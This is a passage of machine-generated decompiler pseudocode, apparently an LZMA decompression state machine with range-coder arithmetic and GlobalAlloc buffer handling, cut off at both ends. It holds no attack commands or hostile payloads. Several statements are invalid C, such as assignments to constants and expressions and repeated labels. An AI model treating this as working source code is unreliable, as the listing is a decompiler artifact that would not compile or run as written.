                                                									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                									 *(_t613 - 0x40) = 1;
                                                									_t532 = _t531 - (_t531 >> 5);
                                                									 *_t606 = _t532;
                                                								} else {
                                                									 *(_t613 - 0x10) = _t565;
                                                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                								}
                                                								if( *(_t613 - 0x10) >= 0x1000000) {
                                                									goto L139;
                                                								}
                                                								L137:
                                                								if( *(_t613 - 0x6c) == 0) {
                                                									 *(_t613 - 0x88) = 5;
                                                									L170:
                                                									_t568 = 0x22;
                                                									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                									_t535 = 0;
                                                									L172:
                                                									return _t535;
                                                								}
                                                								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                								L139:
                                                								_t533 =  *(_t613 - 0x84);
                                                								while(1) {
                                                									 *(_t613 - 0x88) = _t533;
                                                									while(1) {
                                                										L1:
                                                										_t534 =  *(_t613 - 0x88);
                                                										if(_t534 > 0x1c) {
                                                											break;
                                                										}
                                                										switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
                                                											case 0:
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                												_t534 =  *( *(_t613 - 0x70));
                                                												if(_t534 > 0xe1) {
                                                													goto L171;
                                                												}
                                                												_t538 = _t534 & 0x000000ff;
                                                												_push(0x2d);
                                                												asm("cdq");
                                                												_pop(_t570);
                                                												_push(9);
                                                												_pop(_t571);
                                                												_t609 = _t538 / _t570;
                                                												_t540 = _t538 % _t570 & 0x000000ff;
                                                												asm("cdq");
                                                												_t604 = _t540 % _t571 & 0x000000ff;
                                                												 *(_t613 - 0x3c) = _t604;
                                                												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                													L10:
                                                													if(_t612 == 0) {
                                                														L12:
                                                														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                														goto L15;
                                                													} else {
                                                														goto L11;
                                                													}
                                                													do {
                                                														L11:
                                                														_t612 = _t612 - 1;
                                                														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                													} while (_t612 != 0);
                                                													goto L12;
                                                												}
                                                												if( *(_t613 - 4) != 0) {
                                                													GlobalFree( *(_t613 - 4));
                                                												}
                                                												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                												 *(_t613 - 4) = _t534;
                                                												if(_t534 == 0) {
                                                													goto L171;
                                                												} else {
                                                													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                													goto L10;
                                                												}
                                                											case 1:
                                                												L13:
                                                												__eflags =  *(_t613 - 0x6c);
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													 *(_t613 - 0x88) = 1;
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                												_t45 = _t613 - 0x48;
                                                												 *_t45 =  *(_t613 - 0x48) + 1;
                                                												__eflags =  *_t45;
                                                												L15:
                                                												if( *(_t613 - 0x48) < 4) {
                                                													goto L13;
                                                												}
                                                												_t546 =  *(_t613 - 0x40);
                                                												if(_t546 ==  *(_t613 - 0x74)) {
                                                													L20:
                                                													 *(_t613 - 0x48) = 5;
                                                													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                													goto L23;
                                                												}
                                                												 *(_t613 - 0x74) = _t546;
                                                												if( *(_t613 - 8) != 0) {
                                                													GlobalFree( *(_t613 - 8));
                                                												}
                                                												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                												 *(_t613 - 8) = _t534;
                                                												if(_t534 == 0) {
                                                													goto L171;
                                                												} else {
                                                													goto L20;
                                                												}
                                                											case 2:
                                                												L24:
                                                												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                												 *(_t613 - 0x84) = 6;
                                                												 *(_t613 - 0x4c) = _t553;
                                                												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                												L132:
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											case 3:
                                                												L21:
                                                												__eflags =  *(_t613 - 0x6c);
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													 *(_t613 - 0x88) = 3;
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												_t67 = _t613 - 0x70;
                                                												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                												__eflags =  *_t67;
                                                												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                												L23:
                                                												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                												if( *(_t613 - 0x48) != 0) {
                                                													goto L21;
                                                												}
                                                												goto L24;
                                                											case 4:
                                                												L133:
                                                												_t531 =  *_t606;
                                                												_t589 = _t531 & 0x0000ffff;
                                                												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                												if( *(_t613 - 0xc) >= _t565) {
                                                													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                													 *(_t613 - 0x40) = 1;
                                                													_t532 = _t531 - (_t531 >> 5);
                                                													 *_t606 = _t532;
                                                												} else {
                                                													 *(_t613 - 0x10) = _t565;
                                                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                												}
                                                												if( *(_t613 - 0x10) >= 0x1000000) {
                                                													goto L139;
                                                												}
                                                											case 5:
                                                												goto L137;
                                                											case 6:
                                                												__edx = 0;
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) = 1;
                                                													 *(__ebp - 0x84) = 7;
                                                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t613 - 0x54) = _t606;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                												__esi =  *(__ebp - 0x60);
                                                												__cl = 8;
                                                												__cl = 8 -  *(__ebp - 0x3c);
                                                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                												__ecx =  *(__ebp - 0x3c);
                                                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                												__ecx =  *(__ebp - 4);
                                                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                												__eflags =  *(__ebp - 0x38) - 4;
                                                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												if( *(__ebp - 0x38) >= 4) {
                                                													__eflags =  *(__ebp - 0x38) - 0xa;
                                                													if( *(__ebp - 0x38) >= 0xa) {
                                                														_t98 = __ebp - 0x38;
                                                														 *_t98 =  *(__ebp - 0x38) - 6;
                                                														__eflags =  *_t98;
                                                													} else {
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                													}
                                                												} else {
                                                													 *(__ebp - 0x38) = 0;
                                                												}
                                                												__eflags =  *(__ebp - 0x34) - __edx;
                                                												if( *(__ebp - 0x34) == __edx) {
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													goto L61;
                                                												} else {
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__ecx =  *(__ebp - 8);
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													__al =  *((intOrPtr*)(__eax + __ecx));
                                                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                													goto L41;
                                                												}
                                                											case 7:
                                                												__eflags =  *(__ebp - 0x40) - 1;
                                                												if( *(__ebp - 0x40) != 1) {
                                                													__eax =  *(__ebp - 0x24);
                                                													 *(__ebp - 0x80) = 0x16;
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x28);
                                                													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                													__eax =  *(__ebp - 0x2c);
                                                													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                													__eax = 0;
                                                													__eflags =  *(__ebp - 0x38) - 7;
                                                													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                													__al = __al & 0x000000fd;
                                                													__eax = (__eflags >= 0) - 1 + 0xa;
                                                													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x664;
                                                													__eflags = __eax;
                                                													 *(__ebp - 0x58) = __eax;
                                                													goto L69;
                                                												}
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 8;
                                                												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													L132:
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											case 8:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xa;
                                                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                												} else {
                                                													__eax =  *(__ebp - 0x38);
                                                													__ecx =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 0x38) + 0xf;
                                                													 *(__ebp - 0x84) = 9;
                                                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                												}
                                                												while(1) {
                                                													L132:
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											case 9:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													goto L89;
                                                												}
                                                												__eflags =  *(__ebp - 0x60);
                                                												if( *(__ebp - 0x60) == 0) {
                                                													goto L171;
                                                												}
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                												__eflags = _t259;
                                                												0 | _t259 = _t259 + _t259 + 9;
                                                												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                												goto L76;
                                                											case 0xa:
                                                												goto L0;
                                                											case 0xb:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__ecx =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x20);
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												} else {
                                                													__eax =  *(__ebp - 0x24);
                                                												}
                                                												__ecx =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												goto L88;
                                                											case 0xc:
                                                												L99:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xc;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t334 = __ebp - 0x70;
                                                												 *_t334 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t334;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												__eax =  *(__ebp - 0x2c);
                                                												goto L101;
                                                											case 0xd:
                                                												L37:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xd;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t122 = __ebp - 0x70;
                                                												 *_t122 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t122;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L39:
                                                												__eax =  *(__ebp - 0x40);
                                                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                													goto L48;
                                                												}
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													goto L54;
                                                												}
                                                												L41:
                                                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                												 *(__ebp - 0x48) = __eax;
                                                												__eax = __eax + 1;
                                                												__eax = __eax << 8;
                                                												__eax = __eax + __ebx;
                                                												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edx = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													 *(__ebp - 0x40) = 1;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													__ebx = __ebx + __ebx + 1;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edx;
                                                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L39;
                                                												} else {
                                                													goto L37;
                                                												}
                                                											case 0xe:
                                                												L46:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xe;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t156 = __ebp - 0x70;
                                                												 *_t156 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t156;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												while(1) {
                                                													L48:
                                                													__eflags = __ebx - 0x100;
                                                													if(__ebx >= 0x100) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x58);
                                                													__edx = __ebx + __ebx;
                                                													__ecx =  *(__ebp - 0x10);
                                                													__esi = __edx + __eax;
                                                													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                													__ax =  *__esi;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__edi = __ax & 0x0000ffff;
                                                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                													__eflags =  *(__ebp - 0xc) - __ecx;
                                                													if( *(__ebp - 0xc) >= __ecx) {
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                														__cx = __ax;
                                                														_t170 = __edx + 1; // 0x1
                                                														__ebx = _t170;
                                                														__cx = __ax >> 5;
                                                														__eflags = __eax;
                                                														 *__esi = __ax;
                                                													} else {
                                                														 *(__ebp - 0x10) = __ecx;
                                                														0x800 = 0x800 - __edi;
                                                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                														__ebx = __ebx + __ebx;
                                                														 *__esi = __cx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														continue;
                                                													} else {
                                                														goto L46;
                                                													}
                                                												}
                                                												L54:
                                                												_t173 = __ebp - 0x34;
                                                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                												__eflags =  *_t173;
                                                												goto L55;
                                                											case 0xf:
                                                												L58:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xf;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t203 = __ebp - 0x70;
                                                												 *_t203 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t203;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L60:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													L55:
                                                													__al =  *(__ebp - 0x44);
                                                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                													goto L56;
                                                												}
                                                												L61:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t217 = __edx + 1; // 0x1
                                                													__ebx = _t217;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L60;
                                                												} else {
                                                													goto L58;
                                                												}
                                                											case 0x10:
                                                												L109:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x10;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t365 = __ebp - 0x70;
                                                												 *_t365 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t365;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												goto L111;
                                                											case 0x11:
                                                												goto L69;
                                                											case 0x12:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 0x58);
                                                													 *(__ebp - 0x84) = 0x13;
                                                													__esi =  *(__ebp - 0x58) + 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t613 - 0x54) = _t606;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												__eflags = __eax;
                                                												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                												goto L130;
                                                											case 0x13:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													_t469 = __ebp - 0x58;
                                                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                													__eflags =  *_t469;
                                                													 *(__ebp - 0x30) = 0x10;
                                                													 *(__ebp - 0x40) = 8;
                                                													L144:
                                                													 *(__ebp - 0x7c) = 0x14;
                                                													goto L145;
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												 *(__ebp - 0x30) = 8;
                                                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                												L130:
                                                												 *(__ebp - 0x58) = __eax;
                                                												 *(__ebp - 0x40) = 3;
                                                												goto L144;
                                                											case 0x14:
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                												__eax =  *(__ebp - 0x80);
                                                												 *(_t613 - 0x88) = _t533;
                                                												goto L1;
                                                											case 0x15:
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xb;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                												goto L120;
                                                											case 0x16:
                                                												__eax =  *(__ebp - 0x30);
                                                												__eflags = __eax - 4;
                                                												if(__eax >= 4) {
                                                													_push(3);
                                                													_pop(__eax);
                                                												}
                                                												__ecx =  *(__ebp - 4);
                                                												 *(__ebp - 0x40) = 6;
                                                												__eax = __eax << 7;
                                                												 *(__ebp - 0x7c) = 0x19;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L145;
                                                											case 0x17:
                                                												L145:
                                                												__eax =  *(__ebp - 0x40);
                                                												 *(__ebp - 0x50) = 1;
                                                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                												goto L149;
                                                											case 0x18:
                                                												L146:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x18;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t484 = __ebp - 0x70;
                                                												 *_t484 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t484;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L148:
                                                												_t487 = __ebp - 0x48;
                                                												 *_t487 =  *(__ebp - 0x48) - 1;
                                                												__eflags =  *_t487;
                                                												L149:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__ecx =  *(__ebp - 0x40);
                                                													__ebx =  *(__ebp - 0x50);
                                                													0 = 1;
                                                													__eax = 1 << __cl;
                                                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                													__eax =  *(__ebp - 0x7c);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													while(1) {
                                                														 *(_t613 - 0x88) = _t533;
                                                														goto L1;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x50);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                												__eax =  *(__ebp - 0x58);
                                                												__esi = __edx + __eax;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__ax =  *__esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													__cx = __ax >> 5;
                                                													__eax = __eax - __ecx;
                                                													__edx = __edx + 1;
                                                													__eflags = __edx;
                                                													 *__esi = __ax;
                                                													 *(__ebp - 0x50) = __edx;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
